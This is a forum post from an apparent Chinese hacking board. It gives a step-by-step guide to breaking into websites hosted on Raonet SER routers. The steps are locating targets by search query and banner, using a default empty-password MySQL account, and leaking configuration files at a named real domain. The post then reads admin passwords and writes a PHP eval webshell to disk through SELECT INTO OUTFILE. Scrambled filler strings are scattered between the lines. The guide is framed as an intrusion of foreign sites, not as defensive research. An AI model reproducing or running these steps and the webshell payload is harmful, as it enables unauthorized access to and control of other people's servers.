中国网络渗透测试联盟
标题:
利用某路由器漏洞入侵国外站点
[打印本页]
作者:
admin
时间:
2012-12-10 10:30
标题:
利用某路由器漏洞入侵国外站点
寻找存在漏洞的路由器方法:
' U. P: T- n# N' ?/ `2 L
8 Z' q5 U# G- h0 Z6 i
1:google搜索'Raonet Subscriber Ethernet Router'
}7 D: C- K h; E
9 d2 p( D. Q% q8 a
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
8 j# @. G8 I$ [/ X5 y
. i8 }; r3 e3 ]6 ]$ T/ K- A6 V
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
/ u( O* \! b+ ?9 q
8 x% v. G0 L* Q( b+ D9 k3 Z( U' G
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
8 |( ~/ F# }7 ~# M7 G# J+ l- {
( k! S9 r8 P0 l" S
3 I2 B8 z, S# x$ R' T2 r2 \
1 w( n" j9 Z! c" P+ B' d
入侵步骤:
( ~9 O2 f. @5 i" _9 ^# |1 O
5 ?! ~/ D) d' Y% B- K
1.爆web路径,
http://www.yu1u.org/src/jpgraph_line.php
I. j) A \* [) l" v
$ ^9 d/ ]8 h# T" V6 ~5 l% k. n
2:查看数据库配置文件,
http://www.yu1u.org/inc/conn_db.inc
) ~; ~( s+ O+ ~* k1 h9 {. r
3:得到密码后连接,查看GUI管理密码:
, M& T3 t" D( K+ {$ J6 [! ~
use ser_500
% q8 y8 A3 p% L$ @) L! [( u0 b
select id,passwd from user;
' y( d; q. l; p* l
4:通过数据库写入webshell,执行命令:
# e9 M ], P2 b! i1 } o
use mysql;
+ D6 b# e C4 h3 g8 O2 c' o
create table ok(cmd TEXT);
\# u4 | o; |' F
insert into ok values("<?php @eval($_POST[cmd])?>");
. @1 r+ I' U/ H$ L" Y$ ^& `
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
( s% s# \: k9 ]4 v5 u( K% \8 ~
drop table ok;
7 g( p2 g7 x8 R0 F
2 }% q# a% ?% y& f
5:连接后门shell.php
6 T F0 y7 j1 `
/ y* B1 J9 x( q
6. 搞定!
& ]5 x8 b! o5 C
0 r0 c: q% z. {2 G: ~- _, j: G8 H! E
作者:
Anthony~
时间:
2013-7-27 20:06
这个后果可以很严重的说
作者:
jos666
时间:
2013-7-29 12:07
不错哦,黑服务器补洞。。
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2